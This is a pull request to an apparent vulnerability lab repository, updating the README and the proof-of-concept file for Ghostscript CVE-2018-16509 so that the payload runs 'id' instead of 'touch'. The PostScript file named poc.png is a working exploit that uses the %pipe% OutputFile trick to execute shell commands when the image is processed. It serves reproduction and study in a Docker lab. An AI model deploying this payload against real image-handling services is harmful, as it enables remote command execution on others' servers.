### PR TITLE
Fix command of poc.png and description

### DIFF
--- a/ghostscript/CVE-2018-16509/README.md
+++ b/ghostscript/CVE-2018-16509/README.md
@@ -19,7 +19,7 @@ docker-compose up -d
 
 ## 漏洞复现
 
-上传[poc.png](poc.png)，将执行命令`touch /tmp/success`。此时进入容器`docker-compose exec web bash`，将可以看到/tmp/success已被创建：
+上传[poc.png](poc.png)，将执行命令`id > /tmp/success && cat /tmp/success`。此时进入容器`docker-compose exec web bash`，将可以看到/tmp/success已被创建：
 
 ![](1.png)
 

--- a/ghostscript/CVE-2018-16509/poc.png
+++ b/ghostscript/CVE-2018-16509/poc.png
@@ -5,4 +5,4 @@ legal
 { null restore } stopped { pop } if
 { legal } stopped { pop } if
 restore
-mark /OutputFile (%pipe%touch /tmp/success) currentdevice putdeviceprops
+mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops


### PR DESCRIPTION
The last screenshot (2.png) shows the results from `id` command, but that command didn't exist in the "poc.png" file. So I've added that and also updated the description of commands in README accordingly. I also verfied that we can still get the same results as the first screenshot (1.png). 